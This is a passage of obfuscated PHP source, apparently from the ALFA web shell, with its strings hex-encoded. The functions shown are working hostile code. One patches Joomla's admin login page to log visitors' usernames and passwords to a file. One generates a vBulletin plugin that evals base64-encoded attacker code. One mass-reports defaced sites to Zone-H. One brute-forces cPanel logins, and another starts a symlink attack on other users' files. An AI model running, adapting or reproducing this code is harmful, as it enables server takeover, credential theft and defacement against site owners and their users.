$path; } goto LUHcx; Enl9a: function hijackJoomla($path, $saveto) { $code = "\74\77\160\150\160\40\x6a\151\x6d\160\x6f\162\164\x28\x27\x6a\157\157\x6d\154\141\x2e\165\163\145\162\x2e\141\x75\x74\x68\x65\x6e\164\151\x63\x61\164\151\x6f\156\47\51\73\44\x41\x6c\x66\x61\x5f\141\165\164\150\x20\x3d\x20\x26\x20\112\x41\165\164\150\x65\x6e\x74\151\143\141\x74\x69\x6f\156\72\72\x67\x65\164\111\156\163\164\141\156\x63\145\50\51\73\44\101\x6c\146\x61\x5f\x64\x61\x74\141\x20\x3d\40\x61\x72\162\141\x79\x28\x27\165\x73\145\x72\x6e\x61\x6d\x65\47\75\76\x24\x5f\120\x4f\123\124\133\x27\x75\x73\145\x72\x6e\x61\155\145\47\x5d\x2c\x27\160\141\163\163\167\x6f\162\144\47\x3d\x3e\x24\137\120\117\x53\x54\x5b\x27\160\x61\x73\163\167\144\47\x5d\x29\73\x24\101\154\146\x61\x5f\157\160\x74\151\x6f\x6e\x73\40\75\40\x61\x72\162\x61\x79\x28\x29\73\44\x41\154\x66\141\137\x72\145\163\160\157\156\x73\145\40\x3d\x20\44\101\x6c\146\x61\x5f\141\x75\x74\x68\55\x3e\x61\165\164\x68\x65\156\x74\151\x63\x61\x74\x65\x28\44\101\154\146\x61\x5f\144\x61\164\141\54\x20\x24\x41\x6c\146\141\137\157\160\x74\151\x6f\x6e\163\51\x3b\151\146\50\x24\101\x6c\146\x61\137\x72\145\x73\x70\x6f\156\163\x65\55\x3e\163\164\141\164\165\x73\40\x3d\75\40\61\51\x7b\x24\x61\154\146\141\137\x66\151\x6c\x65\75\42\x7b\163\x61\166\145\164\x6f\137\x70\141\164\x68\175\x22\73\44\146\x70\75\100\x66\157\160\x65\156\x28\x24\141\154\146\141\x5f\x66\x69\154\x65\x2c\42\x61\x2b\42\51\73\100\146\x77\162\151\x74\x65\x28\x24\146\x70\x2c\x20\x24\x41\154\146\141\137\162\x65\163\160\x6f\x6e\163\x65\55\x3e\165\163\x65\x72\156\x61\155\145\56\x22\x3a\42\x2e\x24\137\120\117\123\124\133\x27\x70\x61\x73\163\x77\144\47\x5d\x2e\42\x20\x28\x20\42\x2e\44\x41\x6c\x66\x61\137\x72\145\163\x70\x6f\156\163\145\55\x3e\x65\x6d\141\151\x6c\x2e\x22\40\51\x5c\156\x22\51\x3b\x40\x66\x63\x6c\x6f\163\145\50\44\146\x70\x29\x3b\x24\146\40\75\x20\x40\x66\x69\x6c\x65\50\44\x61\x6c\x66\141\137\146\151\154\x65\x29\x3b\x24\156\x65\167\40\75\x20\x61\162\162\141\171\x5f\165\x6e\151\161\165\145\50\x24\146\51\x3b\44\x66\160\x20\75\x20\100\146\157\x70\x65\x6e\x28\x24\x61\x6c\146\141\137\x66\x69\x6c\145\x2c\40\42\167\42\x29\x3b\146\x6f\162\145\141\143\150\x28\44\156\145\x77\40\141\x73\x20\x24\x76\x61\154\165\x65\163\x29\x7b\x40\x66\160\165\x74\x73\x28\44\x66\160\x2c\x20\44\166\141\x6c\165\145\x73\x29\73\175\x40\146\143\x6c\157\163\x65\50\x24\146\160\x29\x3b\175\x3f\x3e"; $code = str_replace("\x7b\x73\x61\x76\145\164\x6f\x5f\160\141\x74\x68\175", $saveto, $code); $comp = $path . "\x2f\x61\144\x6d\x69\156\151\x73\x74\162\141\x74\x6f\162\57\x63\157\155\160\157\156\x65\156\164\163\57\143\x6f\x6d\137\x6c\x6f\147\151\156\57"; if (@is_file($comp . "\x2f\x6c\x6f\147\x69\x6e\x2e\x70\150\160")) { $login = $comp . "\57\154\157\147\x69\x6e\56\160\x68\160"; } elseif (@is_file($comp . "\x2f\141\144\x6d\151\156\56\154\157\147\x69\156\x2e\x70\x68\160")) { $login = $comp . "\57\141\144\x6d\x69\156\56\x6c\x6f\x67\x69\x6e\x2e\x70\x68\x70"; } else { $login = ''; } if (@is_file($login) and @is_writable($login) and $login != '') { $data_login = @file_get_contents($login); $evil_login = $code . "\12" . $data_login; @file_put_contents($login, $evil_login); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto kS5vr; asGME: function alfaphp2xml() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "\74\144\151\x76\x20\143\154\x61\163\163\75\x68\x65\141\144\145\x72\76\74\143\145\x6e\x74\x65\162\76\x3c\x70\76\74\144\151\166\x20\x63\154\141\x73\163\75\47\x74\x78\x74\146\x6f\x6e\164\x5f\150\x65\141\x64\145\162\x27\x3e\174\x20\x53\150\145\154\x6c\40\106\x6f\162\40\166\102\165\x6c\x6c\x65\164\151\x6e\x20\x7c\x3c\x2f\144\151\166\x3e\x3c\x2f\160\76\x3c\146\157\162\155\x20\157\156\x73\165\x62\x6d\151\x74\x3d\x22\147\x28\x27\160\150\160\62\x78\x6d\154\47\54\156\165\x6c\154\x2c\x74\150\151\163\56\143\157\x64\145\x2e\166\141\154\x75\x65\x2c\x27\76\76\47\51\73\x20\162\145\x74\165\x72\156\40\146\x61\x6c\163\145\73\42\x20\x6d\145\164\x68\x6f\144\75\x27\x70\157\163\164\x27\76\xa\74\160\x3e\x3c\x62\x72\x3e\74\164\x65\x78\x74\141\x72\x65\141\x20\162\157\167\x73\75\x27\x31\62\x27\40\x63\x6f\154\163\75\47\67\60\x27\40\x74\171\x70\x65\75\x27\164\145\x78\164\47\x20\x6e\141\x6d\145\x3d\x27\x63\x6f\144\145\47\x20\160\154\x61\x63\145\x68\x6f\x6c\144\145\x72\75\x22\x69\x6e\163\x65\x72\x74\x20\171\x6f\165\x72\x20\x73\x68\x65\x6c\x6c\x20\143\x6f\x64\x65\42\76\x3c\x2f\164\x65\x78\x74\x61\162\145\141\76\74\142\x72\x2f\76\x3c\142\162\x2f\x3e\xa\x3c\x69\x6e\x70\165\x74\x20\x74\x79\x70\145\75\47\x73\165\142\155\151\164\47\40\156\x61\155\145\75\x27\x67\x6f\x27\40\166\141\154\165\x65\x3d\x27\40\47\x20\x2f\76\x3c\x2f\x70\x3e\x3c\57\x66\x6f\x72\x6d\x3e\74\57\x63\x65\x6e\x74\145\x72\76"; if ($_POST["\141\154\146\x61\62"] && $_POST["\x61\154\x66\x61\x32"] == "\76\76") { echo __pre() . "\x3c\160\x3e\74\x63\x65\x6e\164\x65\x72\76\x3c\x74\145\x78\164\141\x72\x65\x61\40\162\x6f\167\163\x3d\47\x31\60\47\x20\x6e\141\155\145\75\47\165\163\145\x72\163\x27\40\x63\157\154\163\x3d\x27\x38\60\47\76"; echo "\74\77\170\x6d\154\x20\x76\145\162\163\151\157\x6e\x3d\42\x31\x2e\x30\x22\x20\145\156\143\x6f\144\151\x6e\x67\75\42\111\x53\117\x2d\70\70\65\x39\x2d\x31\x22\x3f\76\x3c\160\154\x75\147\x69\156\x73\x3e\74\160\154\x75\147\x69\156\40\141\x63\x74\x69\166\x65\75\42\61\x22\40\x70\162\157\x64\165\x63\x74\75\x22\x76\x62\x75\154\x6c\145\x74\151\x6e\42\x3e\74\164\x69\164\154\x65\76\166\x42\165\154\x6c\145\x74\x69\156\x3c\57\x74\151\x74\154\145\76\74\150\157\157\153\156\141\x6d\145\x3e\x69\156\151\164\x5f\x73\164\x61\x72\164\x75\160\x3c\x2f\x68\157\x6f\x6b\156\141\155\x65\76\x3c\x70\150\x70\x63\x6f\x64\145\76\x3c\41\x5b\x43\104\x41\x54\101\133\x69\x66\x20\x28\x73\164\x72\160\x6f\x73\50\44\x5f\x53\x45\122\x56\x45\x52\x5b\x27\120\110\x50\137\x53\x45\114\106\x27\135\54\42\x73\x75\142\163\x63\x72\x69\160\164\151\x6f\x6e\163\x2e\x70\150\x70\x22\51\51\173\145\x76\x61\x6c\x28\142\141\163\145\66\x34\137\144\145\x63\157\144\145\x28\x27" . __ZW5jb2Rlcg($_POST["\141\154\146\141\x31"]) . "\x27\x29\51\73\x65\170\151\x74\x3b\175\135\135\76\74\x2f\160\150\x70\x63\157\144\145\76\74\x2f\x70\154\x75\147\151\156\x3e\x3c\x2f\160\x6c\x75\147\x69\x6e\x73\76"; echo "\x3c\57\164\145\x78\164\141\x72\x65\x61\x3e\x3c\x2f\x63\145\156\x74\x65\162\x3e\x3c\x2f\x70\76"; } echo "\74\57\x63\x65\156\x74\145\x72\x3e\x3c\x2f\144\151\x76\x3e"; alfafooter(); } goto he7vt; ANGyI: function alfazoneh() { alfahead(); echo "\x3c\x64\x69\166\40\x63\154\141\x73\163\75\x68\x65\141\144\145\x72\76"; if (!function_exists("\x63\x75\162\x6c\137\166\x65\x72\x73\x69\157\x6e")) { echo "\x3c\160\x72\x65\x20\x63\x6c\x61\x73\x73\75\x6d\x6c\61\x20\163\164\x79\x6c\x65\x3d\47\155\x61\162\147\x69\x6e\55\x74\x6f\x70\72\x35\160\170\x27\76\74\143\145\x6e\x74\145\162\76\x3c\146\x6f\156\164\40\143\157\154\x6f\x72\x3d\x72\145\144\x3e\x3c\142\x3e\74\142\151\147\x3e\74\x62\x69\147\x3e\x50\110\120\x20\x43\x55\x52\x4c\40\116\x4f\124\x20\x45\x58\x49\123\124\x20\176\40\x5a\117\116\x45\x20\x48\x20\x4d\101\123\x53\40\x50\x4f\x53\124\105\122\x20\x44\117\105\x53\x20\116\x4f\124\40\127\117\x52\113\74\57\142\76\x3c\57\x66\x6f\x6e\164\76\x3c\57\142\x69\147\x3e\74\x2f\x62\151\147\x3e\x3c\x2f\143\x65\156\164\x65\162\76\x3c\57\x70\x72\x65\76"; } $hackmode = array("\153\x6e\x6f\x77\x6e\40\166\165\154\156\x65\x72\141\x62\x69\x6c\x69\x74\171\40\50\151\x2e\145\56\x20\x75\x6e\160\141\x74\143\150\145\144\40\163\171\x73\164\x65\x6d\x29", "\165\x6e\x64\151\163\143\154\157\163\145\x64\40\x28\x6e\145\167\x29\40\166\165\154\156\145\162\141\x62\151\x6c\x69\164\171", "\x63\157\x6e\146\151\147\165\x72\141\164\x69\157\x6e\x20\57\40\141\x64\155\x69\156\56\x20\x6d\x69\x73\x74\x61\153\x65", "\142\162\165\x74\145\40\146\157\162\143\145\40\x61\164\x74\141\143\153", "\x73\157\x63\x69\x61\x6c\x20\145\x6e\147\x69\156\x65\x65\162\151\156\x67", "\x57\x65\142\40\x53\x65\162\x76\145\x72\x20\151\x6e\x74\x72\x75\163\x69\157\156", "\127\145\x62\40\x53\145\162\x76\145\x72\40\x65\x78\164\145\x72\x6e\141\x6c\x20\155\x6f\x64\x75\x6c\145\40\x69\x6e\164\162\165\163\x69\157\156", "\x4d\x61\x69\x6c\x20\123\145\162\x76\x65\162\40\151\156\x74\162\165\163\x69\157\156", "\x46\124\120\40\x53\145\x72\x76\145\x72\40\151\156\164\x72\x75\x73\x69\x6f\x6e", "\x53\x53\x48\40\x53\145\162\x76\x65\162\40\x69\x6e\x74\162\x75\163\x69\x6f\x6e", "\x54\x65\154\x6e\145\x74\x20\x53\145\x72\x76\x65\x72\x20\x69\x6e\x74\x72\165\x73\151\157\156", "\x52\120\103\x20\123\145\x72\166\x65\x72\x20\x69\x6e\x74\162\x75\x73\151\x6f\x6e", "\123\x68\x61\162\145\163\x20\x6d\151\163\x63\x6f\x6e\x66\x69\x67\165\162\x61\164\x69\157\156", "\117\x74\x68\x65\162\x20\123\145\x72\166\145\x72\x20\151\x6e\164\x72\x75\x73\x69\x6f\x6e", "\123\x51\114\x20\111\156\x6a\145\143\164\151\157\x6e", "\125\122\114\40\x50\157\x69\163\x6f\156\x69\156\x67", "\x46\x69\x6c\145\x20\111\156\143\154\165\x73\x69\157\156", "\x4f\164\x68\x65\x72\x20\127\145\142\40\101\160\160\x6c\151\x63\141\164\151\x6f\x6e\40\x62\x75\x67", "\122\x65\155\157\164\x65\40\141\x64\x6d\x69\156\x69\x73\x74\162\141\164\151\x76\x65\x20\160\141\x6e\145\154\40\141\143\x63\x65\x73\x73\x20\x62\x72\165\x74\145\x66\x6f\162\143\x69\x6e\147", "\122\x65\x6d\157\x74\145\40\x61\144\x6d\x69\156\x69\x73\x74\162\141\164\151\166\145\x20\160\141\156\x65\154\x20\141\143\x63\145\163\x73\40\x70\x61\163\163\167\157\x72\144\40\x67\x75\x65\x73\163\151\156\147", "\122\x65\155\157\x74\x65\x20\141\x64\155\151\x6e\x69\163\164\x72\141\x74\x69\x76\145\x20\160\141\x6e\145\154\x20\141\x63\x63\x65\x73\x73\40\x73\157\x63\x69\x61\x6c\40\x65\156\x67\x69\156\x65\x65\162\151\x6e\x67", "\x41\164\164\141\x63\153\40\141\147\141\151\156\x73\164\40\141\x64\155\151\156\151\x73\x74\x72\141\x74\x6f\x72\x28\x70\141\163\163\167\157\x72\x64\40\x73\x74\145\141\x6c\151\x6e\x67\57\x73\x6e\x69\x66\x66\151\156\147\x29", "\101\x63\x63\x65\163\x73\40\143\x72\x65\x64\145\x6e\164\x69\141\154\x73\x20\164\150\162\x6f\x75\147\150\x20\x4d\141\x6e\x20\x49\x6e\40\164\x68\x65\x20\x4d\151\144\144\154\x65\40\141\164\164\141\143\x6b", "\122\145\155\157\164\145\40\163\145\x72\166\x69\143\x65\x20\160\x61\163\163\x77\x6f\x72\144\x20\147\165\145\x73\x73\151\156\x67", "\x52\x65\x6d\157\x74\x65\x20\x73\145\162\x76\151\143\x65\x20\160\x61\x73\163\x77\x6f\x72\x64\40\x62\162\165\x74\x65\x66\x6f\162\x63\x65", "\x52\145\x72\157\x75\x74\151\156\x67\40\141\146\164\x65\x72\x20\x61\164\x74\141\x63\153\151\x6e\147\x20\164\150\x65\x20\x46\x69\x72\145\x77\x61\154\x6c", "\x52\145\162\157\165\x74\x69\156\147\x20\x61\146\164\145\162\x20\x61\164\x74\x61\x63\153\x69\156\x67\40\164\x68\145\40\122\157\165\164\145\162", "\104\x4e\123\40\x61\x74\x74\141\x63\153\x20\164\150\162\x6f\x75\x67\150\40\163\157\x63\x69\x61\154\x20\145\156\147\x69\x6e\x65\145\x72\x69\x6e\147", "\x44\x4e\123\40\141\x74\x74\x61\143\x6b\40\x74\x68\x72\x6f\x75\x67\x68\x20\143\141\143\150\x65\x20\x70\x6f\151\x73\157\156\x69\156\x67", "\x4e\157\164\40\x61\166\141\151\x6c\x61\142\x6c\x65", "\103\162\x6f\x73\163\55\123\151\x74\x65\40\123\x63\162\x69\160\x74\x69\156\147"); $reason = array("\x48\x65\150\56\56\56\152\x75\x73\x74\40\146\157\x72\40\x66\x75\156\x21", "\x52\x65\x76\145\156\147\145\x20\x61\x67\141\x69\x6e\163\x74\40\x74\150\141\164\x20\167\x65\142\x73\x69\x74\x65", "\120\157\154\x69\x74\x69\143\141\x6c\x20\162\x65\x61\163\157\156\163", "\x41\163\40\x61\40\143\150\x61\154\x6c\x65\x6e\147\x65", "\111\x20\x6a\165\x73\164\x20\167\141\x6e\164\40\x74\x6f\x20\x62\x65\x20\164\150\x65\x20\x62\145\163\x74\40\x64\145\146\141\x63\x65\162", "\120\141\x74\162\x69\x6f\164\151\x73\x6d", "\116\x6f\164\40\141\166\x61\x69\154\x61\142\x6c\145"); echo "\12\x3c\x63\x65\156\x74\145\x72\x3e\x3c\142\x72\76\74\144\151\166\x20\x63\154\x61\x73\163\x3d\x22\x74\170\164\146\x6f\156\x74\137\150\x65\x61\144\145\162\x22\x3e\174\40\x5a\157\x6e\145\x2d\150\40\x4d\x61\x73\163\40\120\157\163\x74\x65\x72\x20\x7c\74\x2f\x64\151\166\76\74\x63\x65\156\164\145\x72\x3e\74\x62\x72\76\12\x3c\146\157\x72\155\40\x61\x63\x74\151\x6f\x6e\x3d\42\42\40\155\x65\164\150\x6f\144\75\42\160\x6f\x73\164\42\x20\x6f\156\163\x75\142\x6d\151\164\x3d\x22\x67\x28\x27\172\157\156\x65\x68\x27\x2c\156\x75\x6c\x6c\x2c\164\x68\151\x73\x2e\144\145\146\141\143\x65\x72\x2e\x76\141\154\x75\x65\54\164\150\x69\163\56\150\x61\143\153\x6d\x6f\144\x65\x2e\x76\x61\154\x75\x65\54\164\150\x69\163\56\162\x65\x61\x73\157\156\56\166\x61\x6c\165\145\54\x74\150\x69\163\56\144\x6f\155\x61\x69\x6e\x2e\166\141\154\x75\145\x2c\47\76\x3e\x27\51\73\x20\x72\145\x74\165\162\156\x20\146\x61\x6c\163\x65\x3b\42\x3e\xa\74\151\x6e\160\165\164\40\x74\171\x70\x65\x3d\42\x74\145\170\164\x22\40\x6e\141\155\x65\75\x22\x64\145\146\141\143\145\162\x22\40\x73\x69\172\145\x3d\x22\x36\x37\x22\x20\151\x64\75\42\164\145\x78\x74\42\40\160\154\141\143\145\150\x6f\154\x64\x65\x72\75\42\101\x4c\106\x41\40\124\x45\x61\115\40\x32\60\61\x32\x22\x20\x2f\76\12\74\142\162\76\xa\x3c\163\145\x6c\x65\143\x74\40\151\x64\x3d\x22\164\x65\170\x74\x22\40\156\141\x6d\x65\x3d\42\x68\141\143\x6b\x6d\157\144\x65\x22\x20\x73\x74\x79\154\145\x3d\42\167\x69\x64\x74\150\72\x34\60\60\x70\170\x3b\x22\76"; $x = 1; foreach ($hackmode as $mode) { echo "\74\x6f\x70\x74\x69\x6f\156\x20\163\x74\x79\154\x65\x3d\42\142\x61\143\x6b\147\x72\x6f\165\156\x64\55\143\157\x6c\x6f\162\72\40\162\x67\142\x28\106\54\40\106\x2c\x20\106\x29\x3b\x22\x20\x76\141\154\x75\145\x3d\42" . $x . "\42\76" . $mode . "\74\57\157\160\164\151\157\x6e\x3e"; $x++; } echo "\74\x2f\x73\x65\154\x65\143\x74\76\74\142\162\76\74\163\x65\154\x65\143\164\40\151\x64\75\x22\164\x65\x78\x74\x22\40\x6e\x61\155\x65\75\42\162\x65\141\x73\157\x6e\x22\40\163\x74\171\x6c\145\75\x22\x77\x69\144\x74\x68\72\62\60\x30\160\170\x3b\x22\x3e"; $x = 1; foreach ($reason as $mode) { echo "\x3c\157\160\x74\151\x6f\x6e\x20\163\164\x79\x6c\x65\75\42\x62\x61\x63\153\x67\162\157\165\x6e\144\55\x63\x6f\x6c\x6f\162\72\x20\x72\147\x62\50\x46\54\x20\x46\x2c\40\106\x29\73\x22\40\x76\141\154\x75\x65\75\42" . $x . "\42\76" . $mode . "\74\57\x6f\x70\x74\x69\x6f\156\76"; $x++; } echo "\74\57\x73\145\154\x65\143\x74\x3e\x3c\142\162\x3e\12\74\164\x65\170\x74\141\162\x65\x61\40\x6e\141\x6d\145\x3d\x22\x64\x6f\x6d\141\x69\x6e\42\x20\143\x6f\x6c\163\x3d\42\71\x30\42\x20\x72\157\167\x73\75\x22\x32\60\42\x20\160\x6c\x61\x63\145\x68\x6f\154\x64\145\x72\75\42\104\x6f\x6d\x61\151\156\x73\x2e\56\56\42\76\x3c\57\x74\145\x78\x74\x61\162\x65\x61\x3e\x3c\142\162\76\xa\x3c\x70\x3e\x3c\151\x6e\160\165\x74\x20\164\x79\x70\x65\x3d\42\x73\165\142\155\151\164\42\40\x76\x61\x6c\x75\145\x3d\x22\40\x22\x20\x6e\141\155\145\75\x22\147\157\42\x20\x2f\x3e\x3c\57\160\x3e\12\74\57\146\x6f\162\x6d\76\74\57\143\145\x6e\x74\145\x72\76"; if ($_POST["\141\x6c\x66\141\65"] && $_POST["\x61\x6c\146\x61\65"] == "\76\x3e") { ob_start(); $hacker = $_POST["\x61\x6c\146\x61\x31"]; $method = $_POST["\141\154\x66\141\62"]; $neden = $_POST["\141\154\146\141\x33"]; $site = $_POST["\141\154\146\141\64"]; if (empty($hacker)) { die(__pre() . "\x3c\143\145\x6e\164\145\162\76\x3c\142\76\74\x66\x6f\x6e\164\40\x63\157\154\157\162\x20\x3d\x22\x23\x46\106\x30\x30\x30\60\42\x3e\x5b\53\135\40\x59\x4f\x55\x20\x4d\x55\123\x54\40\x46\111\x4c\114\x20\x54\110\x45\x20\x41\x54\124\x41\x43\x4b\x45\122\40\x4e\x41\x4d\105\40\133\53\135\x3c\x2f\146\x6f\156\x74\x3e\x3c\57\142\76\x3c\x2f\x63\145\x6e\x74\x65\x72\76"); } elseif ($method == "\55\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\55\x2d\x2d\55\55\x2d\55\x2d\55\55\x2d\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\55\55\x2d\x2d\55\123\x45\114\x45\103\x54\x2d\x2d\x2d\55\x2d\55\x2d\x2d\55\55\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\55\55\x2d\55\x2d\55\55\x2d\x2d\x2d\55\55\55\x2d\x2d\55\x2d\55") { die(__pre() . "\x3c\143\145\156\164\x65\162\76\74\142\x3e\x3c\x66\157\x6e\x74\x20\143\157\154\157\162\x20\x3d\42\x23\106\106\60\x30\60\60\x22\76\x5b\x2b\x5d\x20\131\117\125\x20\x4d\x55\x53\x54\40\x53\x45\x4c\105\x43\124\40\x54\x48\x45\x20\x4d\105\124\x48\117\x44\40\x5b\x2b\x5d\x3c\x2f\142\76\74\57\146\x6f\x6e\164\x3e\x3c\57\143\145\156\164\145\x72\x3e"); } elseif ($neden == "\55\55\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\55\55\55\55\55\55\x2d\x2d\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\55\123\105\114\x45\x43\x54\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\x2d\55\55\55\x2d\55\55\x2d\x2d\55\55\55") { die(__pre() . "\74\x63\145\x6e\164\145\162\76\74\x62\76\74\x66\157\x6e\164\x20\x63\157\x6c\x6f\162\40\x3d\42\x23\106\106\60\x30\60\x30\42\x3e\x5b\53\x5d\x20\x59\117\x55\40\115\x55\x53\124\x20\x53\105\114\x45\x43\124\x20\x54\110\x45\40\x52\x45\101\123\117\116\40\133\53\x5d\74\x2f\142\76\74\x2f\x66\157\x6e\164\76\74\57\143\145\x6e\164\x65\162\76"); } elseif (empty($site)) { die(__pre() . "\x3c\143\x65\x6e\164\x65\x72\76\74\142\76\74\146\157\156\164\40\143\157\154\157\x72\x20\x3d\x22\43\x46\106\60\60\x30\60\42\76\133\53\135\40\131\117\125\40\115\x55\x53\124\40\111\116\124\x45\x52\x20\124\x48\x45\x20\x53\x49\124\x45\x53\40\x4c\111\123\x54\x20\133\53\135\74\146\157\x6e\x74\76\74\57\x62\76\74\x2f\x63\x65\x6e\164\x65\x72\x3e"); } $i = 0; $sites = explode("\xa", $site); $alfa = new AlfaCURL(); while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "\150\164\164\x70") { $sites[$i] = "\150\164\x74\x70\72\x2f\57" . $sites[$i]; } $alfa->Send("\150\x74\x74\x70\72\57\57\167\x77\x77\56\x7a\157\156\145\55\x68\56\143\x6f\x6d\x2f\156\157\164\x69\146\171\57\x73\x69\x6e\147\154\x65", "\x70\157\x73\x74", "\144\145\146\x61\x63\x65\162\x3d" . $hacker . "\x26\144\x6f\x6d\x61\151\x6e\x31\x3d" . $sites[$i] . "\46\x68\141\143\153\x6d\x6f\144\145\x3d" . $method . "\x26\x72\x65\141\163\157\x6e\75" . $neden); ++$i; } echo __pre() . "\74\x63\145\x6e\x74\x65\162\76\x3c\x66\x6f\156\164\x20\143\157\x6c\157\x72\x20\x3d\x22\43\x30\x30\x41\62\x32\x30\x22\76\x3c\142\76\133\53\x5d\40\x53\x65\156\144\151\156\147\40\123\151\164\145\163\x20\124\157\40\132\157\x6e\x65\55\x48\40\110\x61\x73\40\x42\x65\145\x6e\x20\x43\x6f\155\160\154\145\x74\x65\144\x20\x53\x75\x63\143\x65\163\163\x66\165\x6c\154\171\x20\x21\41\41\x5b\53\x5d\74\57\x62\x3e\74\146\x6f\x6e\x74\76\x3c\57\143\x65\x6e\x74\x65\x72\x3e"; } echo "\x3c\57\144\151\166\x3e"; alfafooter(); } goto aIT44; pr6oW: function Alfa_CP_Cracker($info) { $url = $info["\x70\162\157\164\157\143\x6f\x6c"] . $info["\x74\x61\x72\147\x65\x74"] . "\x3a" . $info["\x70\157\x72\x74"]; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "\115\x6f\172\151\154\x6c\141\x2f\x35\x2e\60\x20\x28\127\x69\x6e\144\157\x77\x73\40\x4e\124\x20\66\x2e\62\73\x20\x57\x4f\127\x36\64\73\40\x72\166\x3a\61\x37\x2e\60\x29\40\x47\145\143\x6b\x6f\57\62\x30\x31\x30\x30\61\60\61\x20\106\151\x72\x65\x66\157\170\x2f\x31\x37\56\60"); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_HTTPHEADER, array("\x41\165\x74\150\157\x72\151\172\141\x74\x69\157\x6e\x3a\40\102\x61\x73\x69\x63\40" . __ZW5jb2Rlcg($info["\165\x73\x65\x72\x6e\141\155\145"] . "\x3a" . $info["\x70\141\163\x73\x77\x6f\162\144"]) . "\12\15")); curl_setopt($curl, CURLOPT_URL, $url); $result = @curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) { echo "\74\146\x6f\x6e\x74\40\143\157\154\x6f\162\75\x27\x72\145\144\x27\76\x45\162\162\157\162\x3a\x20{$curl_error}\74\x2f\146\x6f\x6e\x74\x3e\74\x62\162\x3e"; } elseif (preg_match("\x2f\x66\x69\154\145\x6d\x61\x6e\x61\x67\145\x72\x2f\x69", $result)) { echo "\x55\163\145\x72\116\141\155\145\72\40\74\146\x6f\x6e\164\x20\143\x6f\x6c\x6f\162\75\x22\162\145\144\x22\x3e" . $info["\165\x73\x65\x72\x6e\141\155\145"] . "\74\57\x66\x6f\156\x74\76\40\120\141\x73\163\x57\x6f\x72\x64\x3a\40\x3c\x66\x6f\x6e\164\x20\x63\x6f\x6c\157\162\x3d\42\162\145\x64\x22\x3e" . $info["\160\x61\163\x73\x77\x6f\x72\144"] . "\x3c\57\146\157\x6e\164\x3e\74\146\157\156\164\40\x63\x6f\154\x6f\162\x3d\x22\147\162\x65\145\156\42\76\x20\x20\114\157\x67\x69\x6e\40\x53\165\x63\x63\x65\x73\163\56\56\56\x2e\x3c\x2f\x66\157\x6e\x74\x3e\74\142\162\76"; $info["\x74\x61\x72\147\x65\164"] = $url; CrackerResualt($info); } curl_close($curl); } goto rMYDl; LikDE: function alfasymlink() { alfahead(); AlfaNum(9, 10); alfaCreateParentFolder(); @chdir($GLOBALS["\x68\157\x6d\x65\x5f\x63\167\144"] . "\x2f" . __ALFA_DATA_FOLDER__); echo "\74\x64\151\x76\40\x63\154\141\163\163\75\x68\145\x61\x64\x65\162\76\x3c\142\x72\x3e\x3c\143\x65\156\x74\145\x72\x3e\x3c\x64\x69\166\x20\143\x6c\x61\x73\x73\75\x22\x74\x78\164\146\157\x6e\x74\x5f\x68\145\141\x64\145\162\x22\76\174\x20\x53\x79\155\154\x69\x6e\x6b\40\x7c\x3c\x2f\x64\151\166\76\74\x63\145\x6e\164\145\162\76\x3c\x68\63\x3e\74\141\40\150\x72\x65\x66\x3d\152\x61\166\141\x73\x63\162\x69\x70\x74\72\166\157\x69\144\50\x30\51\x20\157\156\x63\x6c\x69\x63\x6b\75\42\x67\x28\x27\x73\171\155\x6c\151\156\x6b\x27\54\x6e\165\x6c\x6c\x2c\x6e\x75\x6c\x6c\x2c\x27\x73\171\x6d\x70\150\160\x27\x29\42\76\x7c\x20\x53\171\x6d\154\x69\156\153\50\x20\160\x68\160\x20\51\40\174\40\74\x2f\141\x3e\74\x61\x20\150\x72\145\146\x3d\152\141\166\141\163\x63\x72\151\160\x74\x3a\166\157\151\144\50\x30\51\x20\157\x6e\143\154\x69\143\x6b\75\x22\147\x28\47\x73\x79\x6d\154\151\x6e\x6b\x27\54\156\x75\x6c\x6c\x2c\x6e\x75\154\x6c\54\47\x73\171\x6d\160\145\x72\154\47\51\x22\76\x7c\40\123\171\155\154\151\x6e\153\50\x20\x70\145\x72\x6c\40\51\40\x7c\x20\x3c\57\x61\76\74\x61\40\150\162\145\146\75\x6a\x61\x76\x61\x73\143\162\x69\160\164\x3a\166\x6f\x69\144\x28\x30\51\40\x6f\156\x63\154\151\143\x6b\x3d\x22\x67\x28\x27\163\171\155\154\151\x6e\x6b\47\54\x6e\x75\154\x6c\54\156\165\154\154\x2c\x27\163\x79\x6d\x70\171\x27\x29\42\x3e\174\40\x53\171\x6d\154\151\x6e\x6b\50\x20\160\171\164\x68\157\156\x20\51\40\174\40\74\57\141\x3e\74\141\x20\x68\162\145\146\75\152\x61\x76\141\x73\x63\162\151\x70\x74\x3a\166\157\151\144\50\60\x29\x20\x6f\x6e\143\x6c\x69\143\153\75\x22\x67\x28\x27\163\171\x6d\154\151\156\x6b\x27\54\156\x75\x6c\154\x2c\156\165\154\154\54\x6e\165\154\x6c\x2c\156\x75\x6c\154\x2c\x27\x53\171\x6d\106\x69\x6c\145\47\x29\42\x3e\x7c\x20\x46\151\154\x65\40\x53\x79\155\154\151\x6e\153\40\x7c\40\x3c\x2f\x61\76\74\57\150\63\x3e\74\57\143\145\156\164\x65\x72\76"; if (isset($_POST["\141\154\146\141\x32"]) && ($_POST["\141\x6c\146\141\62"] == "\163\x79\x6d\x70\x65\x72\154" || $_POST["\141\154\x66\141\x32"] == "\x73\x79\x6d\x70\171")) { $sympath = alfaMakePwd(); @mkdir("\x63\x67\151\141\154\146\x61", 493); @chdir("\143\x67\x69\141\x6c\x66\141"); 